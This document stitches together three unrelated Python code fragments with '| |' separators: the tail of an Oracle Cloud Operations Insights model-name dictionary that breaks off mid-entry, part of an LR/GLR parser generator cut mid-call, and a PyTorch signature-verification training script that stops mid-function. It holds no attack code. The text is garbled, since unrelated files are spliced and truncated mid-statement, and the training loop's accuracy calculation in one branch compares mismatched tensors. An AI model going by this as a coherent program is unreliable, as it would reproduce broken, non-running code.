"ExadataInsightResourceCapacityTrendAggregation": ExadataInsightResourceCapacityTrendAggregation,
"ExadataInsightResourceCapacityTrendSummary": ExadataInsightResourceCapacityTrendSummary,
"ExadataInsightResourceForecastTrendSummary": ExadataInsightResourceForecastTrendSummary,
"ExadataInsightResourceInsightUtilizationItem": ExadataInsightResourceInsightUtilizationItem,
"ExadataInsightResourceStatistics": ExadataInsightResourceStatistics,
"ExadataInsightResourceStatisticsAggregation": ExadataInsightResourceStatisticsAggregation,
"ExadataInsightSummary": ExadataInsightSummary,
"ExadataInsightSummaryCollection": ExadataInsightSummaryCollection,
"ExadataInsights": ExadataInsights,
"ExadataMemberCollection": ExadataMemberCollection,
"ExadataMemberSummary": ExadataMemberSummary,
"ExadataStorageServerStatisticsSummary": ExadataStorageServerStatisticsSummary,
"HistoricalDataItem": HistoricalDataItem,
"HostConfigurationCollection": HostConfigurationCollection,
"HostConfigurationMetricGroup": HostConfigurationMetricGroup,
"HostConfigurationSummary": HostConfigurationSummary,
"HostCpuHardwareConfiguration": HostCpuHardwareConfiguration,
"HostCpuStatistics": HostCpuStatistics,
"HostCpuUsage": HostCpuUsage,
"HostDetails": HostDetails,
"HostEntities": HostEntities,
"HostHardwareConfiguration": HostHardwareConfiguration,
"HostImportableAgentEntitySummary": HostImportableAgentEntitySummary,
"HostInsight": HostInsight,
"HostInsightResourceStatisticsAggregation": HostInsightResourceStatisticsAggregation,
"HostInsightSummary": HostInsightSummary,
"HostInsightSummaryCollection": HostInsightSummaryCollection,
"HostInsights": HostInsights,
"HostInstanceMap": HostInstanceMap,
"HostMemoryConfiguration": HostMemoryConfiguration,
"HostMemoryStatistics": HostMemoryStatistics,
"HostMemoryUsage": HostMemoryUsage,
"HostNetworkActivitySummary": HostNetworkActivitySummary,
"HostNetworkConfiguration": HostNetworkConfiguration,
"HostPerformanceMetricGroup": HostPerformanceMetricGroup,
"HostProduct": HostProduct,
"HostResourceAllocation": HostResourceAllocation,
"HostResourceCapacityTrendAggregation": HostResourceCapacityTrendAggregation,
"HostResourceStatistics": HostResourceStatistics,
"HostTopProcesses": HostTopProcesses,
"HostedEntityCollection": HostedEntityCollection,
"HostedEntitySummary": HostedEntitySummary,
"ImportableAgentEntitySummary": ImportableAgentEntitySummary,
"ImportableAgentEntitySummaryCollection": ImportableAgentEntitySummaryCollection,
"ImportableEnterpriseManagerEntity": ImportableEnterpriseManagerEntity,
"ImportableEnterpriseManagerEntityCollection": ImportableEnterpriseManagerEntityCollection,
"IngestDatabaseConfigurationDetails": IngestDatabaseConfigurationDetails,
"IngestDatabaseConfigurationResponseDetails": IngestDatabaseConfigurationResponseDetails,
"IngestHostConfigurationDetails": IngestHostConfigurationDetails,
"IngestHostConfigurationResponseDetails": IngestHostConfigurationResponseDetails,
"IngestHostMetricsDetails": IngestHostMetricsDetails,
"IngestHostMetricsResponseDetails": IngestHostMetricsResponseDetails,
"IngestSqlBucketDetails": IngestSqlBucketDetails,
"IngestSqlBucketResponseDetails": IngestSqlBucketResponseDetails,
"IngestSqlPlanLinesDetails": IngestSqlPlanLinesDetails,
"IngestSqlPlanLinesResponseDetails": IngestSqlPlanLinesResponseDetails,
"IngestSqlStatsDetails": IngestSqlStatsDetails,
"IngestSqlStatsResponseDetails": IngestSqlStatsResponseDetails,
"IngestSqlTextDetails": IngestSqlTextDetails,
"IngestSqlTextResponseDetails": IngestSqlTextResponseDetails,
"InstanceMetrics": InstanceMetrics,
"MacsManagedExternalDatabaseConfigurationSummary": MacsManagedExternalDatabaseConfigurationSummary,
"MacsManagedExternalDatabaseInsight": MacsManagedExternalDatabaseInsight,
"MacsManagedExternalDatabaseInsightSummary": MacsManagedExternalDatabaseInsightSummary,
"MacsManagedExternalHostConfigurationSummary": MacsManagedExternalHostConfigurationSummary,
"MacsManagedExternalHostInsight": MacsManagedExternalHostInsight,
"MacsManagedExternalHostInsightSummary": MacsManagedExternalHostInsightSummary,
"OperationsInsightsPrivateEndpoint": OperationsInsightsPrivateEndpoint,
"OperationsInsightsPrivateEndpointCollection": OperationsInsightsPrivateEndpointCollection,
"OperationsInsightsPrivateEndpointSummary": OperationsInsightsPrivateEndpointSummary,
"OperationsInsightsWarehouse": OperationsInsightsWarehouse,
"OperationsInsightsWarehouseSummary": OperationsInsightsWarehouseSummary,
"OperationsInsightsWarehouseSummaryCollection": OperationsInsightsWarehouseSummaryCollection,
"OperationsInsightsWarehouseUser": OperationsInsightsWarehouseUser,
"OperationsInsightsWarehouseUserSummary": OperationsInsightsWarehouseUserSummary,
"OperationsInsightsWarehouseUserSummaryCollection": OperationsInsightsWarehouseUserSummaryCollection,
"OperationsInsightsWarehouseUsers": OperationsInsightsWarehouseUsers,
"OperationsInsightsWarehouses": OperationsInsightsWarehouses,
"PeComanagedDatabaseConnectionDetails": PeComanagedDatabaseConnectionDetails,
"PeComanagedDatabaseHostDetails": PeComanagedDatabaseHostDetails,
"PeComanagedDatabaseInsight": PeComanagedDatabaseInsight,
"PeComanagedDatabaseInsightSummary": PeComanagedDatabaseInsightSummary,
"PeComanagedManagedExternalDatabaseConfigurationSummary": PeComanagedManagedExternalDatabaseConfigurationSummary,
"ProjectedDataItem": ProjectedDataItem,
"ResourceCapacityTrendAggregation": ResourceCapacityTrendAggregation,
"ResourceInsightCurrentUtilization": ResourceInsightCurrentUtilization,
"ResourceInsightProjectedUtilization": ResourceInsightProjectedUtilization,
"ResourceInsightProjectedUtilizationItem": ResourceInsightProjectedUtilizationItem,
"ResourceStatistics": ResourceStatistics,
"ResourceStatisticsAggregation": ResourceStatisticsAggregation,
"ResourceUsageSummary": ResourceUsageSummary,
"ResourceUsageTrendAggregation": ResourceUsageTrendAggregation,
"SqlBucket": SqlBucket,
"SqlInsightAggregation": SqlInsightAggregation,
"SqlInsightAggregationCollection": SqlInsightAggregationCollection,
"SqlInsightThresholds": SqlInsightThresholds,
"SqlInventory": SqlInventory,
"SqlPlanCollection": SqlPlanCollection,
"SqlPlanInsightAggregation": SqlPlanInsightAggregation,
"SqlPlanInsightAggregationCollection": SqlPlanInsightAggregationCollection,
"SqlPlanInsights": SqlPlanInsights,
"SqlPlanLine": SqlPlanLine,
"SqlPlanSummary": SqlPlanSummary,
"SqlResponseTimeDistributionAggregation": SqlResponseTimeDistributionAggregation,
"SqlResponseTimeDistributionAggregationCollection": SqlResponseTimeDistributionAggregationCollection,
"SqlSearchCollection": SqlSearchCollection,
"SqlSearchSummary": SqlSearchSummary,
"SqlStatisticAggregation": SqlStatisticAggregation,
"SqlStatisticAggregationCollection": SqlStatisticAggregationCollection,
"SqlStatistics": SqlStatistics,
"SqlStatisticsTimeSeries": SqlStatisticsTimeSeries,
"SqlStatisticsTimeSeriesAggregation": SqlStatisticsTimeSeriesAggregation,
"SqlStatisticsTimeSeriesAggregationCollection": SqlStatisticsTimeSeriesAggregationCollection,
"SqlStatisticsTimeSeriesByPlanAggregation": SqlStatisticsTimeSeriesByPlanAggregation,
"SqlStatisticsTimeSeriesByPlanAggregationCollection": SqlStatisticsTimeSeriesByPlanAggregationCollection,
"SqlStats": SqlStats,
"SqlText": SqlText,
"SqlTextCollection": SqlTextCollection,
"SqlTextSummary": SqlTextSummary,
"StorageServerDetails": StorageServerDetails,
"SummarizeAwrSourcesSummariesCollection": SummarizeAwrSourcesSummariesCollection,
"SummarizeDatabaseInsightResourceCapacityTrendAggregationCollection": SummarizeDatabaseInsightResourceCapacityTrendAggregationCollection,
"SummarizeDatabaseInsightResourceForecastTrendAggregation": SummarizeDatabaseInsightResourceForecastTrendAggregation,
"SummarizeDatabaseInsightResourceStatisticsAggregationCollection": SummarizeDatabaseInsightResourceStatisticsAggregationCollection,
"SummarizeDatabaseInsightResourceUsageAggregation": SummarizeDatabaseInsightResourceUsageAggregation,
"SummarizeDatabaseInsightResourceUsageTrendAggregationCollection": SummarizeDatabaseInsightResourceUsageTrendAggregationCollection,
"SummarizeDatabaseInsightResourceUtilizationInsightAggregation": SummarizeDatabaseInsightResourceUtilizationInsightAggregation,
"SummarizeDatabaseInsightTablespaceUsageTrendAggregationCollection": SummarizeDatabaseInsightTablespaceUsageTrendAggregationCollection,
"SummarizeExadataInsightResourceCapacityTrendAggregation": SummarizeExadataInsightResourceCapacityTrendAggregation,
"SummarizeExadataInsightResourceCapacityTrendCollection": SummarizeExadataInsightResourceCapacityTrendCollection,
"SummarizeExadataInsightResourceForecastTrendAggregation": SummarizeExadataInsightResourceForecastTrendAggregation,
"SummarizeExadataInsightResourceForecastTrendCollection": SummarizeExadataInsightResourceForecastTrendCollection,
"SummarizeExadataInsightResourceStatisticsAggregationCollection": SummarizeExadataInsightResourceStatisticsAggregationCollection,
"SummarizeExadataInsightResourceUsageAggregation": SummarizeExadataInsightResourceUsageAggregation,
"SummarizeExadataInsightResourceUsageCollection": SummarizeExadataInsightResourceUsageCollection,
"SummarizeExadataInsightResourceUtilizationInsightAggregation": SummarizeExadataInsightResourceUtilizationInsightAggregation,
"SummarizeHostInsightResourceCapacityTrendAggregationCollection": SummarizeHostInsightResourceCapacityTrendAggregationCollection,
"SummarizeHostInsightResourceForecastTrendAggregation": SummarizeHostInsightResourceForecastTrendAggregation,
"SummarizeHostInsightResourceStatisticsAggregationCollection": SummarizeHostInsightResourceStatisticsAggregationCollection,
"SummarizeHostInsightResourceUsageAggregation": SummarizeHostInsightResourceUsageAggregation,
"SummarizeHostInsightResourceUsageTrendAggregationCollection": SummarizeHostInsightResourceUsageTrendAggregationCollection,
"SummarizeHostInsightResourceUtilizationInsightAggregation": SummarizeHostInsightResourceUtilizationInsightAggregation,
"SummarizeHostInsightsTopProcessesUsageTrendCollection": SummarizeHostInsightsTopProcessesUsageTrendCollection,
"SummarizeOperationsInsightsWarehouseResourceUsageAggregation": SummarizeOperationsInsightsWarehouseResourceUsageAggregation,
"SummaryStatistics": SummaryStatistics,
"TablespaceUsageTrend": TablespaceUsageTrend,
"TablespaceUsageTrendAggregation": TablespaceUsageTrendAggregation,
"TopProcessesUsageTrend": TopProcessesUsageTrend,
"TopProcessesUsageTrendAggregation": TopProcessesUsageTrendAggregation,
"UpdateAutonomousDatabaseInsightDetails": UpdateAutonomousDatabaseInsightDetails,
"UpdateAwrHubDetails": UpdateAwrHubDetails,
"UpdateDatabaseInsightDetails": UpdateDatabaseInsightDetails,
"UpdateEmManagedExternalDatabaseInsightDetails": UpdateEmManagedExternalDatabaseInsightDetails,
"UpdateEmManagedExternalExadataInsightDetails": UpdateEmManagedExternalExadataInsightDetails,
"UpdateEmManagedExternalHostInsightDetails": UpdateEmManagedExternalHostInsightDetails,
"UpdateEnterpriseManagerBridgeDetails": UpdateEnterpriseManagerBridgeDetails,
"UpdateExadataInsightDetails": UpdateExadataInsightDetails,
"UpdateHostInsightDetails": UpdateHostInsightDetails,
"UpdateMacsManagedExternalDatabaseInsightDetails": | |
!= "<S>"
yield item
# Merge a kernel item.
def append(self, item):
assert item.production.lhs.name == "<S>" or item.dotPos != 0
if item in self:
self[item].lookahead.update(item.lookahead)
else:
tItem = Item(item.production, item.dotPos, item.lookahead.keys())
self[tItem] = tItem
# Merge an added item.
def addedAppend(self, item):
assert item.dotPos == 0
assert item.production.lhs.name != "<S>"
if item in self._added:
lookahead = self._added[item].lookahead
oldLen = len(lookahead)
lookahead.update(item.lookahead)
return (oldLen != len(lookahead))
else:
self._added[item] = item
return True
# Given a list of items, compute their closure and merge the results into
# the set of added items.
def _closeItems(self, items):
# Iterate over the items until no more can be added to the closure.
i = 0
while i < len(items):
item = items[i]
rhs = item.production.rhs
dotPos = item.dotPos
if dotPos < len(rhs) \
and isinstance(rhs[dotPos], NontermSpec):
for lookahead in item.lookahead.keys():
string = StringSpec( \
String(rhs[dotPos+1:] + [lookahead]))
lhs = rhs[dotPos]
for prod in lhs.productions:
tItem = Item(prod, 0, string.firstSet)
if self.addedAppend(tItem):
items.append(tItem)
i += 1
# Calculate and merge the kernel's transitive closure.
def closure(self):
items = []
for item in self.iterkeys():
rhs = item.production.rhs
dotPos = item.dotPos
if dotPos < len(rhs) and isinstance(rhs[dotPos], \
NontermSpec):
for lookahead in item.lookahead.iterkeys():
string = StringSpec(String(rhs[dotPos+1:] + \
[lookahead]))
lhs = rhs[dotPos]
for prod in lhs.productions:
tItem = Item(prod, 0, string.firstSet)
if self.addedAppend(tItem):
items.append(tItem)
self._closeItems(items)
# Calculate the kernel of the goto set, given a particular symbol.
def goto(self, sym):
ret = ItemSet()
for item in self:
rhs = item.production.rhs
dotPos = item.dotPos
if dotPos < len(rhs) and rhs[dotPos] == sym:
tItem = Item(item.production, dotPos + 1, item.lookahead.keys())
ret.append(tItem)
return ret
# Merge the kernel of other into this ItemSet, then update the closure.
# It is not sufficient to copy other's added items, since other has not
# computed its closure.
def merge(self, other):
items = []
for item in other.iterkeys():
if item in self:
lookahead = self[item].lookahead
tLookahead = []
for sym in item.lookahead.iterkeys():
if sym not in lookahead:
lookahead[sym] = sym
tLookahead.append(sym)
if len(tLookahead) > 0:
tItem = Item(item.production, item.dotPos, tLookahead)
items.append(tItem)
else:
tItem = Item(item.production, item.dotPos, \
item.lookahead.keys())
self[tItem] = tItem
items.append(tItem)
if len(items) > 0:
self._closeItems(items)
return True
else:
return False
# Determine if self and other are weakly compatible, as defined by the
# Pager(1977) algorithm.
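# In terms of the checks below, self and other are weakly compatible if their
# kernels contain the same LR(0) items and, for every pair of kernel items
# (i, j), either the cross lookahead sets are disjoint, or the lookaheads of
# items i and j already intersect within one of the two states.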
def weakCompat(self, other):
# Check for identical kernel LR(0) items, and pair items, for later use.
if len(self) != len(other):
return False
pairs = []
for sItem in self.iterkeys():
if sItem not in other:
return False
oItem = other[sItem]
pairs.append((sItem, oItem))
# Check for lookahead compatibility.
for i in xrange(len(pairs)-1):
iPair = pairs[i]
isItem = iPair[0]
ioItem = iPair[1]
for j in xrange(i+1, len(pairs)):
jPair = pairs[j]
jsItem = jPair[0]
joItem = jPair[1]
if isItem.lookaheadDisjoint(joItem) \
and ioItem.lookaheadDisjoint(jsItem):
pass
elif not isItem.lookaheadDisjoint(jsItem):
pass
elif not ioItem.lookaheadDisjoint(joItem):
pass
else:
return False
return True
class Action(object):
"""
Abstract base class, subclassed by {Shift,Reduce}Action.
"""
def __init__(self): pass
class ShiftAction(Action):
"""
Shift action, with associated nextState.
"""
def __init__(self, nextState):
Action.__init__(self)
self.nextState = nextState
def __repr__(self):
return "[shift %r]" % self.nextState
def __eq__(self, other):
if not isinstance(other, ShiftAction):
return False
if self.nextState != other.nextState:
return False
return True
class ReduceAction(Action):
"""
Reduce action, with associated production.
"""
def __init__(self, production):
Action.__init__(self)
self.production = production
def __repr__(self):
return "[reduce %r]" % self.production
def __eq__(self, other):
if not isinstance(other, ReduceAction):
return False
if self.production != other.production:
return False
return True
class Spec(object):
"""
The Spec class contains the read-only data structures that the Parser
class needs in order to parse input. Parser generation results in a
Spec instance, which can then be shared by multiple Parser instances.
"""
def __init__(self, modules, pickleFile=None, pickleMode="rw",
skinny=True, logFile=None, graphFile=None, verbose=False):
"""
modules : Either a single module, or a list of modules, wherein to
look for parser generator directives in docstrings.
pickleFile : The path of a file to use for Spec pickling/unpickling.
pickleMode : "r" : Unpickle from pickleFile.
"w" : Pickle to pickleFile.
"rw" : Unpickle/pickle from/to pickleFile.
skinny : If true, discard all data that are needed only while
constructing the parsing tables. This reduces the available
debugging context, but substantially reduces pickle size.
logFile : The path of a file to store a human-readable copy of the
parsing tables in.
graphFile : The path of a file to store a graphviz representation
(dot format) of the precedence relationship graph.
verbose : If true, print progress information while generating the
parsing tables.
"""
assert pickleFile == None or type(pickleFile) == str
assert pickleMode in ["rw", "r", "w"]
assert type(skinny) == bool
assert logFile == None or type(logFile) == str
assert graphFile == None or type(graphFile) == str
assert type(verbose) == bool
self._skinny = skinny
self._verbose = verbose
# Default (no) precedence.
self._none = Precedence("none", "fail", {})
self._split = Precedence("split", "split", {})
# Symbols are maintained as two separate sets so that non-terminals and
# terminals (tokens) can be operated on separately where needed.
self._precedences = {self._none.name: self._none,
self._split.name: self._split}
self._nonterms = {}
self._tokens = {eoi.name: eoi, epsilon.name: epsilon}
self._sym2spec = {EndOfInput: eoi, Epsilon: epsilon}
self._productions = []
self._userStartSym = None
self._startSym = None
self._startProd = None
# Everything below this point is computed from the above (once
# introspection is complete).
self._itemSets = [] # Each element corresponds to an element in _action.
self._itemSetsHash = None
# LR parsing tables. The tables conceptually contain one state per row,
# where each row contains one element per symbol. The table is
# conceptually in row-major form, but each row is actually a dictionary.
# If no entry for a symbol exists for a particular state, then input of
# that symbol is an error for that state.
self._action = []
self._goto = []
self._startState = None
self._nActions = 0
self._nConflicts = 0
self._nImpure = 0 # Number of LR impurities (does not affect GLR).
# Introspect modules and generate parse tables.
if type(modules) == types.ModuleType:
# Wrap single module in a list.
modules = [modules]
self._prepare(modules, pickleFile, pickleMode, logFile, graphFile)
def __getPureLR(self):
return (self._nConflicts + self._nImpure == 0)
def __setPureLR(self): raise AttributeError
pureLR = property(__getPureLR, __setPureLR)
def __getConflicts(self): return self._nConflicts
def __setConflicts(self): raise AttributeError
conflicts = property(__getConflicts, __setConflicts)
def __repr__(self):
if self._skinny:
# Print a very reduced summary, since most info has been discarded.
return "Parsing.Spec: %d states, %d actions (%d split)" % \
(len(self._action), self._nActions, self._nImpure)
lines = []
#=======================================================================
lines.append("Precedences:")
deco = [(prec.name, prec) for prec in self._precedences.itervalues()]
deco.sort()
for elm in deco:
prec = elm[1]
lines.append(" %r" % prec)
lines.append("Tokens:")
syms = [sym for sym in self._tokens.itervalues()]
syms.sort()
for token in syms:
lines.append(" %r %r" % (token, token.prec))
lines.append(" First set: %r" % token.firstSet)
lines.append(" Follow set: %r" % token.followSet)
lines.append("Non-terminals:")
syms = [sym for sym in self._nonterms.itervalues()]
syms.sort()
for sym in syms:
lines.append(" %r %r" % (sym, sym.prec))
lines.append(" First set: %r" % sym.firstSet)
lines.append(" Follow set: %r" % sym.followSet)
lines.append(" Productions:")
prods = sym.productions[:]
prods.sort()
for prod in prods:
lines.append(" %r" % prod)
lines.append("Item sets:")
for i in xrange(len(self._itemSets)):
lines.append(" %d: %r" % (i, self._itemSets[i]))
#=======================================================================
ntokens = len(self._tokens) - 1
nnonterms = len(self._nonterms) - 1
nproductions = len(self._productions) - 1
nstates = len(self._action)
lines.append(("Parsing.Spec: %d token%s, %d non-terminal%s, " + \
"%d production%s, %d state%s, %d action%s (%d split):") % \
(ntokens, ("s", "")[ntokens == 1], \
nnonterms, ("s", "")[nnonterms == 1], \
nproductions, ("s", "")[nproductions == 1], \
nstates, ("s", "")[nstates == 1], \
self._nActions, ("s", "")[self._nActions == 1], \
self._nImpure))
if self.pureLR:
lines.append("Algorithm compatibility: GLR, LR")
elif self._nConflicts == 0:
lines.append("Algorithm compatibility: GLR")
else:
lines.append("Algorithm compatibility: None, due to ambiguity")
lines.append("Parsing tables:")
for i in xrange(len(self._action)):
lines.append(" %s" % ("=" * 78))
lines.append(" State %d:%s" % \
(i, ("", " (start state)")[self._startState == i]))
items = [item for item in self._itemSets[i]]
items.sort()
for item in items:
lines.append(" %s%s" % (" " * (len("%d" % i) + 9),
item.lr0__repr__()))
lines.append(" Goto:")
syms = [sym for sym in self._goto[i]]
syms.sort()
for sym in syms:
lines.append(" %15r : %r" % (sym, self._goto[i][sym]))
lines.append(" Action:")
syms = [sym for sym in self._action[i]]
syms.sort()
for sym in syms:
for action in self._action[i][sym]:
conflict = " "
for other in self._action[i][sym]:
if action != other:
resolution = self._resolve(sym, other, action)
if resolution == "err":
conflict = "XXX"
break
if type(action) == ShiftAction:
lines.append("%s %15r : %-6s %d [%s]" % \
(conflict, sym, "shift", action.nextState, \
sym.prec.name))
else:
assert type(action) == ReduceAction
lines.append("%s %15r : %-6s %r" % \
(conflict, sym, "reduce", action.production))
ret = "\n".join(lines)
return ret
def _prepare(self, modules, pickleFile, pickleMode, logFile, graphFile):
"""
Compile the specification into data structures that can be used by
the Parser class for parsing.
"""
# Get the grammar specification.
self._introspect(modules)
# Augment grammar with a special start symbol and production:
#
# <S> ::= S <$>.
assert self._startSym == None
assert isinstance(self._userStartSym, NontermSpec)
self._startSym = NontermSpec(NontermStart, "<S>",
"%s.NontermStart" % __name__, | |
<filename>sigver/featurelearning/train.py<gh_stars>0
import argparse
import pathlib
from collections import OrderedDict
import numpy as np
from typing import Dict, Tuple, Any, Optional
from sklearn.preprocessing import LabelEncoder
import torch
from torch import nn
from torch.nn import functional as F
from torch import optim
from torch.utils.data import TensorDataset, random_split, DataLoader
from torchvision import transforms
from visdom_logger.logger import VisdomLogger
import sigver.datasets.util as util
from sigver.featurelearning.data import TransformDataset
import sigver.featurelearning.models as models
def train(base_model: torch.nn.Module,
classification_layer: torch.nn.Module,
forg_layer: torch.nn.Module,
train_loader: torch.utils.data.DataLoader,
val_loader: torch.utils.data.DataLoader,
device: torch.device,
callback: Optional[VisdomLogger],
args: Any,
logdir: Optional[pathlib.Path]):
""" Trains a network using either SigNet or SigNet-F loss functions on
https://arxiv.org/abs/1705.05787 (e.q. (1) and (4) on the paper)
Parameters
----------
base_model: torch.nn.Module
The model architecture that extracts features from signatures
classification_layer: torch.nn.Module
The classification layer (from features to predictions of which user
wrote the signature)
forg_layer: torch.nn.Module
The forgery prediction layer (from features to predictions of whether
the signature is a forgery). Only used if args.forg = True
train_loader: torch.utils.data.DataLoader
Iterable that loads the training set (x, y) tuples
val_loader: torch.utils.data.DataLoader
Iterable that loads the validation set (x, y) tuples
device: torch.device
The device (CPU or GPU) to use for training
callback: VisdomLogger (optional)
A callback to report the training progress
args: Namespace
Extra arguments for training: epochs, lr, lr_decay, lr_decay_times, momentum, weight_decay
logdir: pathlib.Path (optional)
Where to save the model and training curves
Returns
-------
Dict (str -> tensors)
The trained weights
"""
# Collect all parameters that need to be optimized
parameters = list(base_model.parameters()) + list(classification_layer.parameters())
if args.forg:
parameters.extend(forg_layer.parameters())
# Initialize optimizer and learning rate scheduler
optimizer = optim.SGD(parameters, lr=args.lr, momentum=args.momentum,
nesterov=True, weight_decay=args.weight_decay)
lr_scheduler = optim.lr_scheduler.StepLR(optimizer,
args.epochs // args.lr_decay_times,
args.lr_decay)
best_acc = 0
best_params = get_parameters(base_model, classification_layer, forg_layer)
for epoch in range(args.epochs):
# Train one epoch; evaluate on validation
train_epoch(train_loader, base_model, classification_layer, forg_layer,
epoch, optimizer, lr_scheduler, callback, device, args)
val_metrics = test(val_loader, base_model, classification_layer, device, args.forg, forg_layer)
val_acc, val_loss, val_forg_acc, val_forg_loss = val_metrics
# Keep the best model seen so far (save only when validation accuracy improves)
if val_acc >= best_acc:
best_acc = val_acc
best_params = get_parameters(base_model, classification_layer, forg_layer)
if logdir is not None:
torch.save(best_params, logdir / 'model_best.pth')
if callback:
callback.scalar('val_loss', epoch + 1, val_loss)
callback.scalar('val_acc', epoch + 1, val_acc)
if args.forg:
callback.scalar('val_forg_loss', epoch + 1, val_forg_loss)
callback.scalar('val_forg_acc', epoch + 1, val_forg_acc)
if args.forg:
print('Epoch {}. Val loss: {:.4f}, Val acc: {:.2f}%,'
' Val forg loss: {:.4f}, Val forg acc: {:.2f}%'.format(epoch, val_loss,
val_acc * 100,
val_forg_loss,
val_forg_acc * 100))
else:
print('Epoch {}. Val loss: {:.4f}, Val acc: {:.2f}%'.format(epoch, val_loss, val_acc * 100))
if logdir is not None:
current_params = get_parameters(base_model, classification_layer, forg_layer)
torch.save(current_params, logdir / 'model_last.pth')
if callback:
callback.save(logdir / 'train_curves.pickle')
return best_params
def copy_to_cpu(weights: Dict[str, Any]):
return OrderedDict([(k, v.cpu()) for k, v in weights.items()])
def get_parameters(base_model, classification_layer, forg_layer):
best_params = (copy_to_cpu(base_model.state_dict()),
copy_to_cpu(classification_layer.state_dict()),
copy_to_cpu(forg_layer.state_dict()))
return best_params
def train_epoch(train_loader: torch.utils.data.DataLoader,
base_model: torch.nn.Module,
classification_layer: torch.nn.Module,
forg_layer: torch.nn.Module,
epoch: int,
optimizer: torch.optim.Optimizer,
lr_scheduler: torch.optim.lr_scheduler._LRScheduler,
callback: Optional[VisdomLogger],
device: torch.device,
args: Any):
""" Trains the network for one epoch
Parameters
----------
train_loader: torch.utils.data.DataLoader
Iterable that loads the training set (x, y) tuples
base_model: torch.nn.Module
The model architecture that extracts features from signatures
classification_layer: torch.nn.Module
The classification layer (from features to predictions of which user
wrote the signature)
forg_layer: torch.nn.Module
The forgery prediction layer (from features to predictions of whether
the signature is a forgery). Only used if args.forg = True
epoch: int
The current epoch (used for reporting)
optimizer: torch.optim.Optimizer
The optimizer (already initialized)
lr_scheduler: torch.optim.lr_scheduler._LRScheduler
The learning rate scheduler
callback: VisdomLogger (optional)
A callback to report the training progress
device: torch.device
The device (CPU or GPU) to use for training
args: Namespace
Extra arguments used for training:
args.forg: bool
Whether forgeries are being used for training
args.lamb: float
The weight used for the forgery loss (only used when training with forgeries)
Returns
-------
None
"""
step = 0
n_steps = len(train_loader)
for batch in train_loader:
x, y = batch[0], batch[1]
x = torch.tensor(x, dtype=torch.float).to(device)
y = torch.tensor(y, dtype=torch.long).to(device)
yforg = torch.tensor(batch[2], dtype=torch.long).to(device)
# Forward propagation
features = base_model(x)
if args.forg:
if args.loss_type == 'L1':
# Eq (3) in https://arxiv.org/abs/1705.05787
logits = classification_layer(features)
class_loss = F.cross_entropy(logits, y)
forg_logits = forg_layer(features).squeeze()
forg_loss = F.binary_cross_entropy_with_logits(forg_logits, yforg.float())  # BCE expects float targets
loss = (1 - args.lamb) * class_loss
loss += args.lamb * forg_loss
else:
# Eq (4) in https://arxiv.org/abs/1705.05787
logits = classification_layer(features[yforg == 0])
class_loss = F.cross_entropy(logits, y[yforg == 0])
forg_logits = forg_layer(features)
forg_loss = F.cross_entropy(forg_logits, yforg)
loss = (1 - args.lamb) * class_loss
loss += args.lamb * forg_loss
else:
# Eq (1) in https://arxiv.org/abs/1705.05787
logits = classification_layer(features)
loss = class_loss = F.cross_entropy(logits, y)
# Back propagation
optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_value_(optimizer.param_groups[0]['params'], 10)
# Update weights
optimizer.step()
# Logging
if callback and step % 100 == 0:
iteration = epoch + (step / n_steps)
callback.scalar('class_loss', iteration, class_loss.detach())
pred = logits.argmax(1)
acc = y[yforg == 0].eq(pred).float().mean()
callback.scalar('train_acc', epoch + (step / n_steps), acc.detach())
if args.forg:
forg_pred = forg_logits > 0
forg_acc = yforg.long().eq(forg_pred.long()).float().mean()
callback.scalar('forg_loss', iteration, forg_loss.detach())
callback.scalar('forg_acc', iteration, forg_acc.detach())
step += 1
lr_scheduler.step()
def test(val_loader: torch.utils.data.DataLoader,
base_model: torch.nn.Module,
classification_layer: torch.nn.Module,
device: torch.device,
is_forg: bool,
forg_layer: Optional[torch.nn.Module] = None) -> Tuple[float, float, float, float]:
""" Test the model in a validation/test set
Parameters
----------
val_loader: torch.utils.data.DataLoader
Iterable that loads the validation set (x, y) tuples
base_model: torch.nn.Module
The model architecture that extracts features from signatures
classification_layer: torch.nn.Module
The classification layer (from features to predictions of which user
wrote the signature)
device: torch.device
The device (CPU or GPU) to use for training
is_forg: bool
Whether or not forgeries are being used for training/testing
forg_layer: torch.nn.Module
The forgery prediction layer (from features to predictions of whether
the signature is a forgery). Only used if is_forg = True
Returns
-------
float, float, float, float
The validation accuracy, validation loss, forgery accuracy and forgery loss
"""
val_losses = []
val_accs = []
val_forg_losses = []
val_forg_accs = []
for batch in val_loader:
x, y, yforg = batch[0], batch[1], batch[2]
x = torch.tensor(x, dtype=torch.float).to(device)
y = torch.tensor(y, dtype=torch.long).to(device)
yforg = torch.tensor(yforg, dtype=torch.long).to(device)
with torch.no_grad():
features = base_model(x)
logits = classification_layer(features[yforg == 0])
loss = F.cross_entropy(logits, y[yforg == 0])
pred = logits.argmax(1)
acc = y[yforg == 0].eq(pred).float().mean()
if is_forg:
forg_logits = forg_layer(features)
forg_loss = F.cross_entropy(forg_logits, yforg)
forg_pred = forg_logits.argmax(1)
forg_acc = yforg.long().eq(forg_pred.long()).float().mean()
val_forg_losses.append(forg_loss.item())
val_forg_accs.append(forg_acc.item())
val_losses.append(loss.item())
val_accs.append(acc.item())
val_loss = np.mean(val_losses)
val_acc = np.mean(val_accs)
val_forg_loss = np.mean(val_forg_losses) if len(val_forg_losses) > 0 else np.nan
val_forg_acc = np.mean(val_forg_accs) if len(val_forg_accs) > 0 else np.nan
# float() handles both numpy scalars and the plain-float nan fallbacks above
return float(val_acc), float(val_loss), float(val_forg_acc), float(val_forg_loss)
def main(args):
# Setup logging
logdir = pathlib.Path(args.logdir)
if not logdir.exists():
logdir.mkdir()
if args.visdomport is not None:
logger = VisdomLogger(port=args.visdomport)
else:
logger = None
device = torch.device('cuda', args.gpu_idx) if torch.cuda.is_available() else torch.device('cpu')
print('Using device: {}'.format(device))
torch.manual_seed(args.seed)
if torch.cuda.is_available():
torch.cuda.manual_seed_all(args.seed)
print('Loading Data')
x, y, yforg, usermapping, filenames = util.load_dataset(args.dataset_path)
data = util.get_subset((x, y, yforg), subset=range(*args.users))
if not args.forg:
data = util.remove_forgeries(data, forg_idx=2)
train_loader, val_loader = setup_data_loaders(data, args.batch_size, args.input_size)
print('Initializing Model')
n_classes = len(np.unique(data[1]))
base_model = models.available_models[args.model]().to(device)
classification_layer = nn.Linear(base_model.feature_space_size, n_classes).to(device)
if args.forg:
forg_layer = nn.Linear(base_model.feature_space_size, 3).to(device)
else:
forg_layer = nn.Module() # Stub module with no parameters
if args.test:
print('Testing')
base_model_params, classification_params, forg_params = torch.load(args.checkpoint)
base_model.load_state_dict(base_model_params)
